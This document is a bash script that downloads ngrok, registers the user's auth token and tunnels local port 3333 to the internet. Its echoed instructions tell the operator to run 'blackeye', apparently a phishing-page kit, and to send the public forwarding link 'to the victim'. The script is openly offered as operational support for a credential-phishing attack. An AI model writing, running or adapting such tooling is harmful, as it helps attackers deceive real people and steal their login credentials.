#!/bin/bash
FINDUSER="${SUDO_USER:-${USER}}"
echo "Author: theaqueen21"
echo "										"
echo "Downloading ngrok"
echo "                  

                                                                           "    
echo "kindly follow the instructions"    
echo "										"
echo "note: if you cannot access ngrok.com in your region/country, youll need to turn on a vpn before you continue"
echo "										"                                                                        
if [ "$FINDUSER" == "root" ];then  
cd /$FINDUSER/Downloads
wget "https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz"
tar -xf /$FINDUSER/Downloads/ngrok-v3-stable-linux-amd64.tgz
sleep 1
echo "

										"
echo "Please enter your ngrok token" "," "you can retrieve your token by making an account in ngrok.com"
read token
sleep 0.2
echo "
										"
ngrok authtoken $token
sleep 0.2
echo "

										"
echo "read the description below for further evaluation"			
echo "										"							
echo "1.>""copy the forwarding link generated by ngrok and send it to the victim, once ngrok server is up and running"
echo "										"
echo "2.>""once your done with ngrok you can end it by pressing ctrl + C"
echo "										"										
echo "3.>""type in Y once you've successfully run blackeye to run ngrok"
while true; do
read -rsn1 input
if [ "$input" = "Y" ];then
cd /$FINDUSER/Downloads
sleep 0.2
ngrok http 3333
fi
done
else                                                                                                                              
cd /home/$FINDUSER/Downloads                                                                          
wget "https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz"
tar -xf /home/$FINDUSER/Downloads/ngrok-v3-stable-linux-amd64.tgz
sleep 1
echo "

										"
echo "Please enter your ngrok token" "you can retrieve your token by making an account in ngrok.com"
read token
sleep 0.2
echo "

										"
ngrok authtoken $token
sleep 0.2
echo "

										"
echo "read the description below for further evaluation"			
echo "										"							
echo "1.>""copy the forwarding link generated by ngrok and send it to the victim, once ngrok server is up and running"
echo "										"
echo "2.>""once your done with ngrok you can end it by pressing ctrl + C"
echo "										"										
echo "3.>""type in Y once you've successfully run blackeye to run ngrok"
while true; do
read -rsn1 input
if [ "$input" = "Y" ];then
cd /home/$FINDUSER/Downloads
sleep 0.2
ngrok http 3333
fi
done
fi																											
